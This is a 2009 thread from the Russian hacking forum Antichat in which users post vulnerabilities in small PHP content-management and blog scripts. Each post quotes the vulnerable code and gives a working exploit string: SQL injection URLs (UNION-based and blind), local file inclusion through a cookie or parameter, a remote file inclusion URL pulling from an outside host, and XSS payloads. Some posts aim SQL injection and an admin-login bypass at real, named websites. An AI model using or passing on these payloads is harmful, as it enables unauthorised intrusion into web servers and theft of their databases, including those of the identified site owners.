Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
15.11.2009, 01:11
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: SuLogu
Author: unnamed
Version: 0.6.2
LFI
file: comments.php
PHP код:
...
if (!$language) {
// try to set the user's preferred language from a previous cookie
if ($_COOKIE['bloglang']) {
$language = $_COOKIE['bloglang'];
} else {
$language = $defaultlanguage;
setcookie("bloglang", $defaultlanguage);
}
} else { // language must exists among defined tags
if (!languageexists($language)) {
$language = $defaultlanguage;
setcookie("bloglang", $defaultlanguage);
}
}
// Include corresponding language file.
include("language/" . $language . ".php");
...
target: Отправляем поддельный запрос на сервер,и подставляем в COOKIES: bloglang={LFI}'%00; За пределы директории у меня не вышел,возможно вам повезет больше (:
Также там множество SQL-inj, но разработчики просто удивляют нас,тем что расчитывают,что везде будет включено registers_global.
Например:
file: index.php
PHP код:
...
function imagenavmenu($id, $page) {
global $showall, $language;
$res = mysql_query("SELECT id FROM blogimages WHERE id < " . $id . " ORDER BY id DESC LIMIT 1");
...
Но $id нигде не будет объявляться,так что скрипт,как и SQL-inj убдет работать только на registers_global = on;
?id=-1+union+select+1,2,3,4,version(),6,7/*
Последний раз редактировалось m0Hze; 15.11.2009 в 15:54..
|
|
|
15.11.2009, 01:18
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
EasyNEWS SQL injection
easynews.php:
PHP код:
...
if (isset($_GET['id'])) {
$id = $_GET['id'];
$query = 'SELECT * FROM `'.$table_name.'` WHERE newstime='.$id.'';
...
Эксплаьация:
Код:
http://localhost/10/easynews.php?id=1+union+select+1,version(),3,4,5,6--+
|
|
|
|
15.11.2009, 01:40
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: pHpAS (Article System)
Author: unnamed
Version: 1.12
SQL
file: show.php
PHP код:
...
f(isset($_GET['id'])) {
$sql = "SELECT * FROM arts WHERE id=".$_GET['id'];
$resultaat = mysql_query($sql);
...
target: show.php?id=-1+union+select+1,2,version(),4/*
file: show_comments.php
PHP код:
if(isset($_GET['nr'])) {
$sql = "SELECT * FROM comments WHERE nr=".$_GET['nr'];
$resultaat = mysql_query($sql);
target: show_comments.php?nr=-1+union+select+1,2,3,4,version(),6/*
file: comments_all.php
PHP код:
$sql = "SELECT * FROM comments WHERE id=".$HTTP_GET_VARS['id']."";
/* Тут писатель совсем разленился,даже проверок нет :( */
target: comments_all.php?id=-1+union+select+1,version(),3,4,5,6/*
XSS
file: show.php
PHP код:
...
if (mysql_num_rows($resultaat) >0) {
..
else{
echo 'geen resultaten gevonden voor id='.$_GET['id'];
...
target: show.php?id="><XSS>
file: show_comments.php
PHP код:
if (mysql_num_rows($resultaat) >0) {
...
}
else{
echo 'geen resultaten gevonden voor id='.$_GET['id'];
target: show_comments.php?nr="><XSS>
Последний раз редактировалось m0Hze; 15.11.2009 в 15:58..
|
|
|
|
15.11.2009, 01:42
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Сообщение от Grey
А где он в том коде, что ты выложил должен объявляться?
function imagenavmenu($id <------- Вот это, разве не объявление переменной в функции???, $page)
М.б. стоит показать как идёт обращение к функции, может там так:
imagenavmenu($_GET[id] $_GET[page])?
Ты меня совсем не понял, непосредственно в движке,нет вообще обращени к $_GET,$_POST,$_HTTP_VARS.Все расчитано на register_globals = on, во всяком случае тот что у меня.
2jokester, извини что не выкладываю вместе со столбцами.Я не устанавливаю движки на свой компьютер,смотрю непосредственно в блокноте.
Завтра все поправлю.Это же из каталога скриптов ^_^
/addдобавил полный код лфи sulog, забыл строчку с инклудом.
|
|
|
|
15.11.2009, 04:15
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Minibill CMS 1.2.5
SQL INJECTION:
PHP код:
...
if ($_GET['order_id'])
{
$Q="SELECT * FROM orders WHERE order_id='$_GET[order_id]' AND user_id='$_SESSION[id]' LIMIT 1";
$preOrder = mysql_fetch_assoc(mysql_query($Q));
...
Реализация:
Код:
http://localhost/13/pages/orderform.php?order_id=[SQL]
Версия:
Код:
http://localhost/13/CHANGELOG
Установочный SQL дамп:
Так же можно найти установочный дамп БД с имнами таблиц и колонок (если его админ не потер или не выставил права):
Код:
http://localhost/13/sql/minibill.sql
RFI:
PHP код:
...
include($config['include_dir']."dbConnect.php");
...
Код:
http://localhost/13/crontab/run_invoicing.php?config[include_dir]=http://google.com%00
|
|
|
|
15.11.2009, 21:35
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Название: MigasCMS
Версия: 1.0
Залитие шелла.
Нужны права администратора.
Отсутствует проверка на формат файла.
Раскрытие путей
/cms/index.php?mode=view&recid[]=
/cms/index.php?mode[]=
|
|
|
|
15.11.2009, 22:57
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Copyright © 2005
Программное обеспечение - BORNET.ru
sql-inj
http://www.evruka.ru/show_cat2.php?grid=-1%27+union+select+1,2,3,4,5,6,7,8,9,10,11+--%20- в админку без пароля:
admin' or true -- -
example:
http://www.evruka.ru/admin/
__________________
Появляюсь редко. Важные дела в реале.
Последний раз редактировалось AFoST; 15.11.2009 в 23:08..
|
|
|
|
16.11.2009, 01:13
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
PHPNS version 2.2.4 BLIND SQL INJECTION
Уязвимый скрипт manage.php:
PHP код:
...
while ($item_row = mysql_fetch_array($item_list)) { //for each item in db
//convert timestamp to readable/human date
$item_row['timestamp'] = date($globalvars['time_format'],$item_row['timestamp']);
$item_row['article_cat_name'] = gen_cat_name($item_row['article_cat']); //switch cat_id to readable name
$row_bg = ($row_bg == $globalvars['altcolor'][2]) ? $globalvars['altcolor'][1] : $globalvars['altcolor'][2]; //current row bg
//switch active column to yes, draft, or unapproved.
if ($item_row['active'] == 1) { $item_row['active'] = '<span class="positive">Yes</span>'; } elseif ($item_row['active'] == 0) { $item_row['active'] = '<span class="negative">Draft</span>'; }
if ($item_row['approved'] == 0) { $item_row['active'] = '<span class="negative">Unapproved</span>'; }
$item_row['comments'] = mysql_num_rows(general_query('SELECT * FROM '.$databaseinfo['prefix'].'comments WHERE article_id="'.$item_row['id'].'"'));
if (strlen($item_row['article_title']) > 30) {
$item_row['article_title'] = wordwrap($item_row['article_title'], 30, "<br />");
}
//generate the actual html rows
$table_rows = $table_rows.'<tr bgcolor="'.$row_bg.'">
<td>
<a href="article.php?id='.$item_row['id'].'&do=edit"><img src="images/icons/edit.png" class="row_icon" alt="edit icon" title="edit "'.$item_row['article_title'].'"" /></a>
<a href="article.php?id='.$item_row['id'].'&do=edit" title="edit "'.$item_row['article_title'].'""><strong>'.$item_row['article_title'].'</strong></a>
</td>
<td><a href="manage.php?v='.$item_row['article_cat'].'">'.$item_row['article_cat_name'].'</a></td>
<td>'.$item_row['timestamp'].'</td>
<td><a href="manage.php?v='.$item_row['article_author'].'">'.$item_row['article_author'].'</a></td>
<td align="center"><a href="article.php?do=comments&id='.$item_row['id'].'">'.$item_row['comments'].'</a></td>
<td align="center">'.$item_row['active'].'</td>
<td class="checkbox"><input type="checkbox" value="'.$item_row['id'].'" name="'.$item_row['id'].'"></td></tr>';
} //end of each item in db generation
...
Реализация:
Код:
http://localhost/15/manage.php?v=1'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1--+
Таблица с юзерами: phpns_users
Для успешной реализации - magic_quotes_gpc = off
|
|
|
|
16.11.2009, 17:48
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843
Репутация:
204
|
|
Сообщение от AFoST
Copyright © 2005
Программное обеспечение - BORNET.ru
sql-inj
http://www.evruka.ru/show_cat2.php?grid=-1%27+union+select+1,2,3,4,5,6,7,8,9,10,11+--%20- в админку без пароля:
admin' or true -- -
example:
http://www.evruka.ru/admin/
Я, конечно, дико извиняюсь, но выложил до этого http://forum.antichat.net/showthread.php?p=1194275#post1194275
НУ и еще......
WebGrand CMS 2.0 © 2003
Код:
http://www.la-primavera.org/admin/
Эксплуатация.
Недостаточная фильтрация.
(c)
Последний раз редактировалось Shaitan-Devil; 16.11.2009 в 17:56..
|
|
|
|
16.11.2009, 21:08
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
[ Cerulean Portal System version 0.7 LFI ]
Уязвимый код portal.php:
PHP код:
...
include ($phpbb_root_path . 'portal/config.' . $phpEx);
...
Реализация:
Код:
http://localhost/18/portal.php?phpEx=./../../file.php
Требования: register_globals = ON
Так же там есть RFI, но его я не выкладываю, так как его нашли ранше меня и уже опубликовали 
Последний раз редактировалось Ins3t; 16.11.2009 в 21:11..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
